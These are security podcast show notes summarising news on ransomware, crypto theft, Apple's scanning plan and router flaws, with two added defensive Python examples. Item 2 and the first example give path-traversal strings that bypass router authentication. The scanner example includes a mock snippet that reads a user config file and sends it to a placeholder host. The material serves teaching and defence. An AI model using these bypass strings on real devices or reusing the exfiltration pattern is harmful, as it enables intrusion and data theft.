Cyber-Symposiums, Apple Backdoor, Crypto Theft, & “Quadruple Extortion” – PSW #706
This week in the Security News: Accenture gets Lockbit, $600 million in cryptocurrency is stolen, and they've started returning it, Lee and Jeff's data is leaked (among other senior citizens), authentication bypass via path traversal, downgrade attacks, Apple's backdoor, super duper secure mode, re-defining end-to-end encryption and how that doesn't work out, pen testers file suit against Dallas County Sheriff's department, Fingerprinting Windows, double secret quadruple extortion, & more!
CyberRisk Alliance, in partnership with InfraGard, has launched the Critical Infrastructure Resilience Benchmark study. Measure your readiness for ransomware by completing the survey and getting your score. Visit https://securityweekly.com/CIRB to take the survey
In an overabundance of caution, we have decided to flip this year’s SW Unlocked to a virtual format. The safety of our listeners and hosts is our number one priority. We will miss seeing you all in person, but we hope you can still join us at Security Weekly Unlocked Virtual! The event will now take place on Thursday, Dec 16 from 9am-6pm ET. You can still register for free at https://securityweekly.com/unlocked.
- 1. Chaos Malware Walks Line Between Ransomware and Wiper - Nasty: "Instead of encrypting files (which could then be decrypted after the target paid the ransom), it replaced the files' contents with random bytes, after which the files were encoded in Base64. This meant that affected files could no longer be restored, providing victims no incentive to pay the ransom." "One of the more interesting functions of Chaos version 1.0 was its worming function, which allowed it to spread to all drives found on an affected system," de Jesus wrote. "This could permit the malware to jump onto removable drives and escape from air-gapped systems."
- 2. Hacker Exploiting Authentication Bypass Bug On Millions Of Routers - Yikes: "For a device in which http://<host>/index.htm requires authentication, an attacker could access index.htm using the following paths: http://<host>/images/..%2findex.htm or http://<host>/js/..%2findex.htm or http://<host>/css/..%2findex.htm" Great article on the details: https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
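The bypass quoted above works because the access check looks at the request path in one form (raw, still percent-encoded, "starts with /images/") while the file handler resolves it in another (decoded, with `..` collapsed). The example below is added here to illustrate that mismatch from the defender's side; it is not code from the Tenable writeup or from any router firmware. The public-prefix list, the toy dispatcher and the sample request paths are all constructed for the demonstration. The hardened check decodes to a fixed point and normalizes before comparing, so the authorization decision is made on the same path the server would actually serve.

```python
"""Path-traversal authentication bypass: a naive allowlist check beside a
hardened one. Constructed demonstration; the directory layout and request
paths are assumptions modelled on the pattern discussed above."""
import posixpath
from urllib.parse import unquote

# Static directories served without authentication (assumed layout).
PUBLIC_PREFIXES = ("/images/", "/js/", "/css/")


def is_public_naive(raw_path):
    """Vulnerable pattern: decides on the raw, still percent-encoded path.

    '/images/..%2findex.htm' starts with '/images/', so it is treated as
    public, but a file handler that decodes %2f to '/' and resolves '..'
    ends up serving /index.htm.
    """
    return raw_path.startswith(PUBLIC_PREFIXES)


def fully_decode(raw_path, max_rounds=3):
    """Percent-decode until the string stops changing (bounded).

    Decoding to a fixed point means a downstream layer that decodes once
    more cannot see a different path than the one the access check saw
    (double encoding such as %252f is handled by the second round).
    """
    for _ in range(max_rounds):
        decoded = unquote(raw_path)
        if decoded == raw_path:
            break
        raw_path = decoded
    return raw_path


def canonicalize(raw_path):
    """Return the single canonical form of a request path.

    Decode, then collapse '.' and '..' segments. posixpath.normpath drops
    '..' segments that would climb above '/', so the result stays rooted.
    """
    decoded = fully_decode(raw_path)
    return posixpath.normpath("/" + decoded.lstrip("/"))


def is_public_hardened(raw_path):
    """Authorize on the canonical path, the form the file handler resolves."""
    return canonicalize(raw_path).startswith(PUBLIC_PREFIXES)


def handle_request(raw_path, authenticated, public_check):
    """Toy dispatcher: 200 if the path is public or the caller is
    authenticated, otherwise 401. Exists only to compare the two checks."""
    if authenticated or public_check(raw_path):
        return 200
    return 401


if __name__ == "__main__":
    # Sample request paths (constructed) from an unauthenticated client.
    probes = [
        "/css/style.css",           # genuinely public
        "/index.htm",               # protected page, requested directly
        "/images/..%2findex.htm",   # traversal via encoded slash
        "/js/%2e%2e/index.htm",     # traversal via encoded dots
        "/css/..%252findex.htm",    # double-encoded slash
    ]
    for p in probes:
        print(f"{p:28} naive={handle_request(p, False, is_public_naive)} "
              f"hardened={handle_request(p, False, is_public_hardened)} "
              f"canonical={canonicalize(p)}")
```

Running it shows the naive check returning 200 for every traversal probe while the hardened check returns 401 for all of them and still serves `/css/style.css`. The general rule the example demonstrates: normalize once, to the same representation the resource layer uses, and make every security decision on that form.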
- 3. Apple’s Plan to “Think Different” About Encryption Opens a Backdoor to Your Private Life - Interesting take on this and how it could be abused from a privacy perspective: "This means that if—for instance—a minor using an iPhone without these features turned on sends a photo to another minor who does have the features enabled, they do not receive a notification that iMessage considers their image to be “explicit” or that the recipient’s parent will be notified. The recipient’s parents will be informed of the content without the sender consenting to their involvement. Additionally, once sent or received, the “sexually explicit image” cannot be deleted from the under-13 user’s device."
- 4. Microsoft announces new ‘Super Duper Secure Mode’ for Edge - "Encouraged by these findings, Norman said the Edge team is now working on Super Duper Secure Mode, an Edge configuration where they disable JIT and enable three other security features such as Control-flow Enforcement Technology (CET) and Arbitrary Code Guard (ACG)—two features that would normally clash with V8’s JIT implementation. As Norman explained, Super Duper Secure Mode is currently classified as an experiment, and there are no plans set in stone to ship it to users just yet."
- 5. INFRA:HALT security bugs impact critical industrial control devices - We've seen this before, very bad: "They impact the DNS client and the HTTP server components of the stack, allowing a remote attacker to execute code on the vulnerable device to take full control over it. To trigger CVE-2020-25928, an attacker would need to send a crafted DNS packet as a response to a DNS query from the vulnerable device, Forescout and JFrog researchers explain in a joint technical report published earlier today."
- 6. Zoom to pay $85M for lying about encryption and sending data to Facebook and Google - Trying to re-define end-to-end encryption: "The connection between the Zoom app running on a user's computer or phone and Zoom's server is encrypted in the same way the connection between a web browser and a website is encrypted. This is known as transport encryption, which is different from end-to-end encryption because the Zoom service itself can access the unencrypted video and audio content of Zoom meetings. In a Zoom meeting utilizing this encryption technology, the video and audio content will stay private from anyone spying on Wi-Fi, but will not stay private from the company or, presumably, anyone with whom the company shares its access voluntarily, by compulsion of law (e.g., at the request of law enforcement), or involuntarily (e.g., a hacker who can infiltrate the company's systems). With true E2E encryption, the encryption keys are generated by the client (customer) devices, and only the participants in the meeting have the ability to decrypt it." Whereas, in Zoom's case, "the encryption keys for each meeting are generated by Zoom's servers, not by the client devices."
- 7. Credit card-stealing malware found in official Python repository - I really want to know if a library is accessing my file system and/or communicating with IP addresses on the Internet... This one steals your Discord auth tokens and credit cards stored by your browser...
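The wish expressed above, knowing whether a dependency touches the file system or talks to the network before you install it, can be approximated with a static pass over the package's source. The scanner below is an added example, not the article's or PyPI's tooling; it walks a module's AST and reports imports and calls that reach the network or open files. The module lists are a starting heuristic I chose, not a complete inventory, and the sample source it scans is constructed for the demonstration (it is not the malware from the story).

```python
"""Static triage of a Python module for network and file-system access.
Added example with constructed sample input; module lists are a heuristic."""
import ast

# Top-level packages whose use implies network I/O (assumed starting list).
NETWORK_MODULES = {"socket", "urllib", "http", "requests", "ftplib", "smtplib", "ssl"}
# Top-level packages whose use implies file-system access (assumed starting list).
FILE_MODULES = {"os", "shutil", "pathlib", "glob", "sqlite3", "tempfile"}
# Builtins that open files directly.
FILE_CALLS = {"open"}


def _dotted(node):
    """Render an Attribute/Name chain such as socket.socket as 'socket.socket'.
    Returns None when the callee is not a plain dotted name (e.g. a call result)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _classify_module(lineno, module, findings):
    """Record an import finding by its top-level package; return its category."""
    top = module.split(".")[0]
    if top in NETWORK_MODULES:
        findings.add((lineno, "network-import", module))
        return "network"
    if top in FILE_MODULES:
        findings.add((lineno, "filesystem-import", module))
        return "filesystem"
    return None


def scan_source(source, filename="<module>"):
    """Return sorted (lineno, category, detail) findings for one module's source."""
    tree = ast.parse(source, filename)
    findings = set()
    network_names = set()  # names bound by `from <network module> import x`

    # Pass 1: imports, so later calls through imported names can be attributed.
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                _classify_module(node.lineno, alias.name, findings)
        elif isinstance(node, ast.ImportFrom) and node.module:
            if _classify_module(node.lineno, node.module, findings) == "network":
                for alias in node.names:
                    network_names.add(alias.asname or alias.name)

    # Pass 2: calls that open files or reach a network module directly or via
    # a name imported from one.
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        if name is None:
            continue
        top = name.split(".")[0]
        if name in FILE_CALLS:
            findings.add((node.lineno, "file-open", name))
        elif top in NETWORK_MODULES or top in network_names:
            findings.add((node.lineno, "network-call", name))
    return sorted(findings)


# Constructed sample: a "library" that reads a local config and phones home.
SAMPLE = '''\
import os
import socket
from urllib.request import urlopen

def sync():
    cfg = open(os.path.expanduser("~/.config/app/settings.json")).read()
    urlopen("http://example.invalid/telemetry", data=cfg.encode())
'''

if __name__ == "__main__":
    for lineno, category, detail in scan_source(SAMPLE, "sample.py"):
        print(f"sample.py:{lineno}: {category}: {detail}")
```

Pointing `scan_source` at each `.py` file in an unpacked wheel or sdist (before installing it, so no `setup.py` runs) gives a quick list of where to look first; it is a triage aid, not proof of safety, since dynamic imports, `exec`, and obfuscated strings will not show up.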
- 8. Men File Lawsuit Against Dallas County Sheriff - "Gary DeMercurio and Justin Wynn have filed a civil lawsuit against Dallas County and Sheriff Chad Leonard from an incident that occurred in September 2019 when the two men broke into the Dallas County Courthouse claiming they were hired to do so. The two men worked for cybersecurity advisor Coalfire, which is headquartered in Colorado."
- 9. Fingerprinting Windows versions, AV, wireless cards over the network—all without authentication - Using Windows DCE/RPC (TCP port 135), HD and team were able to more accurately fingerprint the Windows OS type and version, in addition to determining whether the host has a Wi-Fi adapter and even what type of AV software is running. Amazing research!
- 10. Crypto-mining botnet modifies CPU configurations to increase its mining power - We need more power, captain: "In a report published last week, Uptycs researchers said they spotted a crypto-mining botnet in June 2021 that was breaching Linux servers, downloading the Linux MSR driver, and then disabling hardware prefetching before installing a version of XMRig, a common app used for cryptocurrency mining by both legitimate users and malware gangs. Uptycs believes the attacker got the idea to disable hardware prefetching after reading the XMRig documentation, where it is claimed that XMRig can gain a 15% speed boost if the feature is disabled."
- 11. A Botnet is Attacking Synology NAS Devices: Here’s How to Secure Yours - Why do you need your NAS device on the Internet!?!?
- 12. Glowworm-Attack - Wow: "In this paper, we identify a new class of optical TEMPEST attacks: recovering sound by analyzing optical emanations from a device’s power indicator LED. We analyze the response of the power indicator LED of various devices to sound and show that there is an optical correlation between the sound that is played by connected speakers and the intensity of their power indicator LED due to the facts that: (1) the power indicator LED of various devices is connected directly to the power line, (2) the intensity of a device's power indicator LED is correlative to the power consumption, and (3) many devices lack a dedicated means of countering this phenomenon."
- 13. Ransomware Payments Explode Amid ‘Quadruple Extortion’ - "1) Encryption: Victims pay to regain access to scrambled data and compromised computer systems that stop working because key files are encrypted. 2) Data Theft: Hackers release sensitive information if a ransom is not paid. 3) DoS: Ransomware gangs launch DoS attacks that shut down a victim’s public websites. 4) Harassment: Cybercriminals contact customers, business partners, employees and media to tell them the organization was hacked."
- 14. Accenture claims to fight off LockBit ransomware gang with backup - "Cybercrime intelligence firm Hudson Rock revealed that nearly 2,500 computers of Accenture partners and employees were compromised. Another research firm Cyble tweeted that the attackers stole 6TB of data and have demanded a ransom of $50 million."
- 1. Catalin Cimpanu on Twitter - A security researcher (@HarioMenkel) has released today a tool named CobaltSpam that can flood Cobalt Strike servers with fake beacons and corrupt their internal databases of infected systems.
- 2. 1M Stolen Credit Cards Hit Dark Web for Free
- 3. Robert Graham @ Sioux Falls cyber symposium on Twitter - A good thread on the outcomes of the MyPillow guy CyberSymposium. Not a political talk.
- 4. vx-underground on Twitter - Accenture got ransomwared...?
- 5. Plugins 2500/2501 and 16800/16801 are deprecated - Hashcat, why you gotta mess with a good thing?
- 1. Over $600 million reportedly stolen in cryptocurrency hack - Poly Network has disclosed that hackers managed to steal more than $600 million USD in Binance Chain, Ethereum, and Polygon cryptocurrency assets and transfer it to attacker-controlled wallets, in what is being called one of the largest DeFi hacks to date.
- 2. Bulletin: The Importance of Properly Scoping Cloud Environments - Guidance from CSA/PCI Security Standards Council on requirements and processes to assess cloud-based payment processing systems. What's new is the tools to help the assessment.
- 3. Millions of Senior Citizens’ Personal Data Exposed by Misconfiguration - Millions of senior citizens in North America have had their personal information compromised following a breach at senior care review website SeniorAdvisor, containing millions of files labeled "leads" and 182GB of personally identifiable information (PII) belonging to some three million of its users.
- 4. Microsoft Exchange servers scanned for ProxyShell vulnerability, Patch Now - Attackers have been spotted leveraging three chained vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) dubbed "ProxyShell" that, when chained together, can be remotely exploited via the Microsoft Exchange "Client Access Service" (CAS) running in IIS on port 443. According to reports, the ProxyShell vulnerabilities are capable of performing unauthenticated, remote code execution (RCE) against Microsoft Exchange servers.
- 5. Vulnerability Affecting Routers From Many Vendors Exploited Days After Disclosure - Cybercriminals quickly started exploiting a vulnerability that affects routers and modems from many vendors that use the same underlying firmware. CVE-2021-20090 is associated with Arcadyan firmware found in the products of 19 manufacturers, including ADB, ASMAX, ASUS, Beeline, BT, Buffalo, Deutsche Telekom, HughesNet, KPN, O2, Orange, Skinny, SparkNZ, Telecom Argentina, Telmex, Telstra, Telus, Verizon, and Vodafone.
- 6. FlyTrap Android Malware Used to Compromise Facebook Accounts - Zimperium has revealed new Android malware said to have compromised the Facebook accounts of more than 10,000 people across 144 countries since March. The company dubbed this malware FlyTrap and said that until recently it was listed on the official Google Play Store.
- 7. Black Hat USA: Downgrade attack against Let’s Encrypt lowers the bar for printing fraudulent SSL certificates - Thanks Gus for finding this! The downgrade attacks act to undermine a system with “multiple vantage points to multiple nameservers” by reducing it to “multiple vantage points to a single attacker-selected nameserver”. The system is tricked into using a specific nameserver by introducing high latency into connections to other validation nodes. In controlled tests, the researchers found that attackers were able to launch attacks against one in four (24.53%) of domains.